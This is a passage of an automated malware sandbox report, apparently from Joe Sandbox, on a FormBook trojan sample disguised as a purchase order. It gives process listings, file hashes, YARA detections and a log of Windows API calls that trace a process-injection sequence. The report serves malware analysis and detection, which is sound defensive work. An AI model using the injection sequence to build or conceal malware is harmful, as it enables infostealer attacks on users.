                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe"
                        Imagebase:0x950000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        Target ID:17
                        Start time:22:51:13
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\setupugc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\setupugc.exe"
                        Imagebase:0xe20000
                        File size:118'784 bytes
                        MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Has exited:false

                        Target ID:20
                        Start time:22:51:26
                        Start date:08/09/2024
                        Path:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe"
                        Imagebase:0x950000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Has exited:false

                        Target ID:21
                        Start time:22:51:37
                        Start date:08/09/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:0x7ff6bf500000
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true


                          Execution Graph

                          Execution Coverage:10.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:2.6%
                          Total number of Nodes:229
                          Total number of Limit Nodes:18
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 00C8D0BE
                          • GetCurrentThread.KERNEL32 ref: 00C8D0FB
                          • GetCurrentProcess.KERNEL32 ref: 00C8D138
                          • GetCurrentThreadId.KERNEL32 ref: 00C8D191
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 00C8D0BE
                          • GetCurrentThread.KERNEL32 ref: 00C8D0FB
                          • GetCurrentProcess.KERNEL32 ref: 00C8D138
                          • GetCurrentThreadId.KERNEL32 ref: 00C8D191
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F484F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F484F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0

                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C8AFFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0

                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 00C859C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0

                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 00C859C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0

                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd

                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F480C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F480C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F481A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F47AE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C8D717
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F481A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F47AE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C8AFFE
                            • Part of subcall function 00C8A130: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8B079,00000800,00000000,00000000), ref: 00C8B28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: HandleLibraryLoadModule
                          • String ID:
                          • API String ID: 4133054770-0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C8D717
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F47FE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8B079,00000800,00000000,00000000), ref: 00C8B28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: b7055784bee3539d25c7922412c81f7c4f64af49a3ed983d6383276b9ba9e91a
                          • Instruction ID: dec258b80b7e0b5aa256ef3617473f2f65ee54af98af4c2eb882453aface4894
                          • Opcode Fuzzy Hash: b7055784bee3539d25c7922412c81f7c4f64af49a3ed983d6383276b9ba9e91a
                          • Instruction Fuzzy Hash: 021126B69003099FCB10DF9AC444ADEFBF4EB88724F10842ED419A7210C375A945CFA8
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8B079,00000800,00000000,00000000), ref: 00C8B28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 7d1ad93b460c95af3a942d8b9af5821a9ad0dad7a04ab69a64e9f23156270875
                          • Instruction ID: cc4b67c7e052364a12aba663b4fcb82f81b6bede230dcc1c4c33f0eeba1c0c0d
                          • Opcode Fuzzy Hash: 7d1ad93b460c95af3a942d8b9af5821a9ad0dad7a04ab69a64e9f23156270875
                          • Instruction Fuzzy Hash: D61114B6D002498FCB10DFAAC444ADEFBF4EB49324F14842ED469A7210C375A945CFA5
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F47FE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 9d40947c95b8426c7e68105d9a78bee82ba7fb9ab6c9c888affc5964ac1d0550
                          • Instruction ID: 5dd59cebbeb34731a404bf293f56bd446240766d8cf8e50d29c358d46a7aaa1e
                          • Opcode Fuzzy Hash: 9d40947c95b8426c7e68105d9a78bee82ba7fb9ab6c9c888affc5964ac1d0550
                          • Instruction Fuzzy Hash: 3A1126719002499FCB10EFAAC844ADFBFF5EB88324F148419E559A7250CB75A554CFA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: e83b3a076c6ccc753318a70d92c4b804e7b8718372ade071e5af716fb1ea41b3
                          • Instruction ID: d13dbab84992ec698c25abd2d866828e5352723e5895680d51af73069bd1a87d
                          • Opcode Fuzzy Hash: e83b3a076c6ccc753318a70d92c4b804e7b8718372ade071e5af716fb1ea41b3
                          • Instruction Fuzzy Hash: 601128B1D002498FDB20EFAAC8457DFFBF5EB88324F248419D459A7250CB75A544CFA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 3f8e42cc39dc5ab7f76a597fc51e4f6306727c8d73880e0b21cf2afaccfd56d6
                          • Instruction ID: 5677995c73018597ce6861b2f95af7d23c67495c1ee42dfef9cfa3bbd563ff58
                          • Opcode Fuzzy Hash: 3f8e42cc39dc5ab7f76a597fc51e4f6306727c8d73880e0b21cf2afaccfd56d6
                          • Instruction Fuzzy Hash: 2D1128B1D002498BCB10DFAAC4457DEFBF5AB88324F248419D459A7250CB75A544CFA4
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4CA15
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 987048a5cc248c753abc7a2fa7cf718490c4e31f2bfad78b4e2440a171842d66
                          • Instruction ID: 0d93d51ec07f177efe331e2f2b39cc0d112675b0864495a8fe3ab4d1d968131f
                          • Opcode Fuzzy Hash: 987048a5cc248c753abc7a2fa7cf718490c4e31f2bfad78b4e2440a171842d66
                          • Instruction Fuzzy Hash: AE1110B58003489FCB10DF8AC844BDEBFF8EB48724F10841AE958A7610C375A944CFA0
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4CA15
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 5ab73187412df5d32f5568f683e1237369fe192cc7ae9886e17bdae2ff04e5aa
                          • Instruction ID: 5dd40569185590680d038f17a56316b469cb0b6dea57a39b3f1d66bca48b60e5
                          • Opcode Fuzzy Hash: 5ab73187412df5d32f5568f683e1237369fe192cc7ae9886e17bdae2ff04e5aa
                          • Instruction Fuzzy Hash: E211F2B58003499FCB10DF9AD849BDEBFF8EB48324F208459E558A7610C379A984CFA5
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C8AFFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: a0459d0eaa515edcb788a38a3a683c3d2bb08cb2b46e1957a8bd5561754a98b0
                          • Instruction ID: d032e0906f15043cda8b5d4c541e1dc53e4b9cc4363b3b5c154ded1831f972a6
                          • Opcode Fuzzy Hash: a0459d0eaa515edcb788a38a3a683c3d2bb08cb2b46e1957a8bd5561754a98b0
                          • Instruction Fuzzy Hash: 5B110FB5C002498FCB10DF9AC444ADEFBF4AB88328F10842AD429A7210C379A945CFA5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96357e0fc9ac85cb9aaac9c2f3e4fb0ef4ff9d153171fe41ad53609ca1f5d198
                          • Instruction ID: 471c83236bef67703f8c13b20dbc475e899ad7f491d02dc2817c3cb0814cfc2c
                          • Opcode Fuzzy Hash: 96357e0fc9ac85cb9aaac9c2f3e4fb0ef4ff9d153171fe41ad53609ca1f5d198
                          • Instruction Fuzzy Hash: 28210371504200DFCB05DF14D9C4B6ABFA5FB89310F20C6A9ED1A0B256C336DC96EBA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693458668.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c3d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07cc4578831b1438d5a89b1aae7dab208343f67bf66ca2eee403d86421471c0a
                          • Instruction ID: f83849c2cb15b2bf076dfb5a17411351dfd1b06038082e14ebfe0a5276c0f882
                          • Opcode Fuzzy Hash: 07cc4578831b1438d5a89b1aae7dab208343f67bf66ca2eee403d86421471c0a
                          • Instruction Fuzzy Hash: 84210471614200DFCB18DF24E9C4B26BFA5FB84B14F20C56DE84A4B296C33AD847CA61
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693458668.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c3d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08282dfcc1f5e78612cd9bbf8033ab925dbc528ce171892140d3ac971987bc3c
                          • Instruction ID: c56e87f18b3e4db2993e18518472f903f43b6675b140fa9422c0b0a4fadd530b
                          • Opcode Fuzzy Hash: 08282dfcc1f5e78612cd9bbf8033ab925dbc528ce171892140d3ac971987bc3c
                          • Instruction Fuzzy Hash: F4218E755093808FCB06CF24D994B15BF71EB46314F28C5EAD8498F2A7C33A980ACB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction ID: 8e1e3e522292dd89262426c07bb77576d413e9931da5e782c67b938e984c8473
                          • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction Fuzzy Hash: 8521E176404240CFCB06CF00D9C4B56BF72FB85314F24C2A9DC190B656C33AD96ADBA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de809090532893d80f3c5e2950f49a937d82787b138f231ab9705e2583ec2a62
                          • Instruction ID: 03dc952d8c08561087f6b1730bd308b1d67a471445625fc1b3a39c998272293e
                          • Opcode Fuzzy Hash: de809090532893d80f3c5e2950f49a937d82787b138f231ab9705e2583ec2a62
                          • Instruction Fuzzy Hash: 0801A7710083449AE7104A2ACD847E7FF98EF42324F18C56AED1A4A2DAC279D8C0D6F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22d18a18d0ee037d3302d123aecf26de690ec9b22f9533ea27173862bb5eec6a
                          • Instruction ID: 07853f925d88492b8165d5810c1390445d985247c052ae24cc0bb2b821695150
                          • Opcode Fuzzy Hash: 22d18a18d0ee037d3302d123aecf26de690ec9b22f9533ea27173862bb5eec6a
                          • Instruction Fuzzy Hash: 37F0C2720043449AE7108A1ACC84BA7FFA8EF91734F18C55AED094E286C2799880CAB0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 782bbfb7a96b1d4db163d8c27b6547b7917af10057e6a4a2247a900a75e61e79
                          • Instruction ID: d4ab0704223cfa0e62ba539e2bc2420ed52592bbd179bcd1945497bd0c48abf5
                          • Opcode Fuzzy Hash: 782bbfb7a96b1d4db163d8c27b6547b7917af10057e6a4a2247a900a75e61e79
                          • Instruction Fuzzy Hash: 40E12D74E001198FDB14EFA9C6809AEFBF2FF49304F248169D414A775ADB35A941CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d56cd47786c38c3d77346595b6bb6020a5203c93dac8c5b712e5e3b5de47d2cb
                          • Instruction ID: cf194b1081e42110424935cbf82f1b819c84da53d56fb22d729b2083a6679ae3
                          • Opcode Fuzzy Hash: d56cd47786c38c3d77346595b6bb6020a5203c93dac8c5b712e5e3b5de47d2cb
                          • Instruction Fuzzy Hash: 66E10C74E001198FDB54EF99C6809AEFBF2FF49304F248169E414AB75ADB35A941CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 807871c85bd5c97c420d757d060f340c0066c4420a183314d9e5fb2b955d9efe
                          • Instruction ID: b2f718a1952d579824add87f8ffcaeaebc44f18db660cbdb18eac8ca9ea7da89
                          • Opcode Fuzzy Hash: 807871c85bd5c97c420d757d060f340c0066c4420a183314d9e5fb2b955d9efe
                          • Instruction Fuzzy Hash: D1E1FD74E001198FCB54EFA9C6809AEFBF2FF89305F248159D414AB756DB35A941CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d33f08b490f3e552afaae8171d305cc37338a0e0313396cca4f9761026a6bb0
                          • Instruction ID: 15a0d37f2b8a72e186c2f06cc0628c6d1491cd91238f26423c6a8cb620af5e31
                          • Opcode Fuzzy Hash: 1d33f08b490f3e552afaae8171d305cc37338a0e0313396cca4f9761026a6bb0
                          • Instruction Fuzzy Hash: C4E1FD74E001198FCB54DFA9C6809AEFBF2FF89304F248169E414AB756DB35A941CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 312e8ab856403f2a134902038fbe9d58f9326711f220b7b7874aba9fcfc1b1b0
                          • Instruction ID: add6942521be82334ca7563b9bf0fffe2fba49bffd21c7c66a5c6c30321b5ffd
                          • Opcode Fuzzy Hash: 312e8ab856403f2a134902038fbe9d58f9326711f220b7b7874aba9fcfc1b1b0
                          • Instruction Fuzzy Hash: 46E1EB74E001198FDB54EF99C6809AEFBB2FF49304F248169E418A7756DB35AD41CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1694595355.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2a20000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5687781dec2dc270a75fb1110ac54e7f9dc1fabb5b9f8107c896fd04a445dabe
                          • Instruction ID: 7743f444306e5a5f3f057e57e62edb10c5b6ab84451126c107051883fe743ffc
                          • Opcode Fuzzy Hash: 5687781dec2dc270a75fb1110ac54e7f9dc1fabb5b9f8107c896fd04a445dabe
                          • Instruction Fuzzy Hash: 97D1F631D1075A8ACB11EB64DA90ADDB7B1FFD6300F10879AE00937655EF70AAC9CB91
                          Memory Dump Source
